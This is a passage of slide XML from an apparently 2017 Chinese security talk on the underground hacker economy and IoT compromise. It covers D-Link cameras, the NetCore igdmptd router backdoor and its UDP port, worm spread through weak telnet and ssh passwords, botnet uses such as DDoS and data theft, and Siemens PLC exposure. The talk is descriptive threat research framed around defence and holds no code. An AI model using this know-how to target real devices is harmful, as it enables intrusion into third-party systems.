                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15963" y="18582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15872" y="18503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15732" y="18483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15702" y="18417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15855" y="18350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15820" y="18301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15547" y="18326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15527" y="18264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15436" y="18235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15321" y="18210"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18161" y="18447"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18122" y="18454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18055" y="18471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18028" y="18474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17989" y="18483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17935" y="18499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17882" y="18536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17883" y="18555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17934" y="18562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17988" y="18552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18052" y="18528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18104" y="18503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18161" y="18447"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12604" y="18666"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12376" y="18696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12330" y="18769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12458" y="18760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12564" y="18740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12717" y="18732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12872" y="18764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="18678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12604" y="18666"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12163" y="18752"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11975" y="18772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12010" y="18823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12140" y="18836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12209" y="18789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12163" y="18752"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17946" y="18802"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17938" y="18809"/>
                  <a:pt x="17931" y="18817"/>
                  <a:pt x="17924" y="18824"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17914" y="18824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17946" y="18802"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13537" y="18848"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13497" y="18895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13463" y="18944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13476" y="19028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13574" y="18932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13576" y="18876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13537" y="18848"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8273" y="18920"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8154" y="19009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8319" y="19048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354" y="19102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8687" y="19201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8762" y="19198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8896" y="19228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9110" y="19297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9283" y="19336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9475" y="19365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9642" y="19375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9846" y="19435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10056" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9827" y="19326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9549" y="19282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9480" y="19203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9137" y="19112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9097" y="19154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8745" y="19097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8719" y="19053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642" y="19033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8494" y="18964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8273" y="18920"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17420" y="19141"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17378" y="19161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17301" y="19211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17171" y="19296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17089" y="19353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17069" y="19344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17005" y="19403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16894" y="19482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16804" y="19526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16653" y="19600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16540" y="19671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16469" y="19713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16392" y="19777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16370" y="19811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16281" y="19883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16301" y="19885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16422" y="19827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16633" y="19708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16708" y="19654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16809" y="19588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16936" y="19504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17040" y="19439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17151" y="19373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17210" y="19333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17277" y="19294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17383" y="19216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17360" y="19220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17338" y="19220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17439" y="19144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17420" y="19141"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12143" y="19361"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12086" y="19380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11956" y="19393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11797" y="19429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11775" y="19455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11591" y="19509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="19580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11494" y="19617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11515" y="19629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11674" y="19597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11795" y="19509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11951" y="19467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12145" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12214" y="19368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12143" y="19361"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11394" y="19386"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11226" y="19432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11103" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10987" y="19412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10839" y="19435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10840" y="19476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11086" y="19487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11366" y="19449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11394" y="19386"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10463" y="19392"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10415" y="19429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10312" y="19427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10250" y="19487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10349" y="19493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477" y="19481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10692" y="19464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10645" y="19415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10531" y="19422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10463" y="19392"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10835" y="19536"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10662" y="19556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10908" y="19632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10987" y="19629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10997" y="19600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10933" y="19568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10835" y="19536"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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" name="全球地下黑客的帝国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519937">
              <a:defRPr sz="8010"/>
            </a:pPr>
            <a:r>
              <a:t>全球地下黑客的帝国</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="519937">
              <a:defRPr sz="9612"/>
            </a:pPr>
            <a:r>
              <a:t>网络空间IoT战场</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="余弦 | 2017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余弦 | 2017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基础参数 + 人类活动 = ？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基础参数 + 人类活动 = ？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答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答案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="网络空间资源生态平衡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网络空间资源生态平衡</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>推论1：持续资源掠夺战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>推论2：网络空间不会被摧毁，除非网络空间之外的人类文明消失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build="p" bldLvl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几个案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几个案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="D-Link网络摄像头全球监控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D-Link网络摄像头全球监控</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>磊科路由器igdmptd后门百万级僵尸网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>西门子PLC工控网络的沦陷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D-Link网络摄像头全球监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D-Link网络摄像头全球监控</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161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2" name="图片 9" descr="图片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7600" y="2341037"/>
            <a:ext cx="8229600" cy="3819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图片 11" descr="图片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8112" y="3369200"/>
            <a:ext cx="7648576" cy="1009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图片 12" descr="图片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59200" y="3045350"/>
            <a:ext cx="5486400" cy="1657351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter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</p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="图片 4" descr="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect t="8252"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047875" y="4486116"/>
            <a:ext cx="8909116" cy="4659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6" descr="Picture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18242" y="5055651"/>
            <a:ext cx="5568316" cy="3381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 advAuto="0"/>
      <p:bldP spid="164" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="165" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="166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百万级僵尸网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百万级僵尸网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="磊科(NetCore)路由器igdmptd后门时间线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5970" indent="-275970" defTabSz="309625">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="2438"/>
            </a:pPr>
            <a:r>
              <a:t>磊科(NetCore)路由器igdmptd后门时间线</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="551941" lvl="1" indent="-275970" defTabSz="309625">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="2438"/>
            </a:pPr>
            <a:r>
              <a:t>2014/8/25，趋势科技研究员Tim Yeh发文描述了磊科疑似后门的igdmptd程序，全球有200多万台磊科路由受影响</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="551941" lvl="1" indent="-275970" defTabSz="309625">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="2438"/>
            </a:pPr>
            <a:r>
              <a:t>2014/10/3，Tim Yeh再次发文称磊科官方发布了新版固件，但新固件中只是默认关闭了后门程序，而并未将其删除。ShadowServer的统计受影响路由器仍有100多万台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="551941" lvl="1" indent="-275970" defTabSz="309625">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="2438"/>
            </a:pPr>
            <a:r>
              <a:t>2014/12/28，国内研究员h4ckmp发文详细分析了该后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="551941" lvl="1" indent="-275970" defTabSz="309625">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="2438"/>
            </a:pPr>
            <a:r>
              <a:t>2014/12/31，ZoomEye Team进行了细节验证并发文</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="551941" lvl="1" indent="-275970" defTabSz="309625">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:defRPr sz="2438"/>
            </a:pPr>
            <a:r>
              <a:t>2015/9，ZoomEye Team的探测发现UDP 53413端口的IP总数约为140万，其中110万左右是存在后门的磊科路由器，95%分布在中国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百万级僵尸网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百万级僵尸网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="磊科这个igdmptd后门威力如何？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2005" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>磊科这个igdmptd后门威力如何？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="604011" lvl="1" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>以root权限执行系统命令，任意文件上传、下载</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="604011" lvl="1" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>某些常用路由配置功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="302005" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>在我们取证分析中发现这些路由器早被虐遍了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="604011" lvl="1" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>绝大多数木马为MIPS平台上的ELF可执行程序，大都采用了随机文件名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="604011" lvl="1" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>其中少数为.sh程序，多用于进一步下载相关ELF木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="604011" lvl="1" indent="-302005" defTabSz="338835">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="2667"/>
            </a:pPr>
            <a:r>
              <a:t>在3次扫描中，共抓取到近1400个木马样本，其中不同MD5值的一共有583个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百万级僵尸网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百万级僵尸网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="磊科后门木马的特点：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1766" indent="-421766" defTabSz="473201">
              <a:spcBef>
                <a:spcPts val="3700"/>
              </a:spcBef>
              <a:defRPr sz="3725"/>
            </a:pPr>
            <a:r>
              <a:t>磊科后门木马的特点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="843533" lvl="1" indent="-421766" defTabSz="473201">
              <a:spcBef>
                <a:spcPts val="3700"/>
              </a:spcBef>
              <a:defRPr sz="3725"/>
            </a:pPr>
            <a:r>
              <a:t>基于弱口令（telnet、ssh等）的蠕虫式传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="843533" lvl="1" indent="-421766" defTabSz="473201">
              <a:spcBef>
                <a:spcPts val="3700"/>
              </a:spcBef>
              <a:defRPr sz="3725"/>
            </a:pPr>
            <a:r>
              <a:t>支持多个嵌入式CPU架构（ARM、MIPS、PowerPC）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="843533" lvl="1" indent="-421766" defTabSz="473201">
              <a:spcBef>
                <a:spcPts val="3700"/>
              </a:spcBef>
              <a:defRPr sz="3725"/>
            </a:pPr>
            <a:r>
              <a:t>变种多样、变化频繁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="843533" lvl="1" indent="-421766" defTabSz="473201">
              <a:spcBef>
                <a:spcPts val="3700"/>
              </a:spcBef>
              <a:defRPr sz="3725"/>
            </a:pPr>
            <a:r>
              <a:t>大多利用嵌入式设备进行扫描、DDoS等，少数的呢？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思考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思考</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="思考个问题：你有全球这些IoT控制权，你能如何？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4904" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>思考个问题：你有全球这些IoT控制权，你能如何？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>黑产守则一：流量即钱？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>DDoS/CC资源？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>跳板 - 密网？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>拿用户各类隐私？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="749808" lvl="1" indent="-374904" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>你思考的问题，地下黑客不仅早思考了还行动了...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build="p" bldLvl="5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工控安全"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>工控安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="最需要的脆弱系统"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4089400"/>
            <a:ext cx="10464800" cy="774701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>最需要的脆弱系统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工控经典架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工控经典架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184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1311" y="2911109"/>
            <a:ext cx="6822178" cy="5937982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关于我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关于我</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="黑客猥琐流派系及工程化实践者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黑客猥琐流派系及工程化实践者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>全球网络空间搜索引擎ZoomEye（钟馗之眼）创建者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.zoomeye.org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西门子PLC工控网络的沦陷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西门子PLC工控网络的沦陷</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187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8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3855" y="3579812"/>
            <a:ext cx="8296276" cy="4600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图片 11" descr="图片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1812" y="3847107"/>
            <a:ext cx="9401176" cy="4086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2555" y="4160838"/>
            <a:ext cx="8766176" cy="3724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Picture 4" descr="Pictur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53854" y="4114800"/>
            <a:ext cx="5743576" cy="37703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4" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3478064" y="3900884"/>
            <a:ext cx="6347246" cy="3873618"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6347245" cy="3873617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="192" name="Picture 4" descr="Picture 4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-1"/>
              <a:ext cx="6347246" cy="21531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3" name="Picture 5" descr="Picture 5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1924984"/>
              <a:ext cx="6347246" cy="19486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animBg="1" advAuto="0"/>
      <p:bldP spid="190" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="191" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="194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思考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思考</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="全球这么多脆弱的IoT设备，你有何感想？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2420" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>全球这么多脆弱的IoT设备，你有何感想？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>我们该做什么？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>我们的应急响应呢？黄金应急时间呢？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>如何对抗这群地下黑客？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>我们必须像他们一样去思考，包括执行力！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>牢记着：对抗是持续的！不是过了黄金时间就可以歇息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="624840" lvl="1" indent="-312420" defTabSz="350520">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:defRPr sz="2760"/>
            </a:pPr>
            <a:r>
              <a:t>幻想着：这些物联网设备的升级（打补丁）会是件容易的事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 build="p" bldLvl="5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蠕虫进化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蠕虫进化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277803" y="3202935"/>
            <a:ext cx="2273916" cy="2245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1" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750199" y="2818711"/>
            <a:ext cx="1277847" cy="1262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" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7880271" y="5764971"/>
            <a:ext cx="1277847" cy="1262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" name="油漆泼溅"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
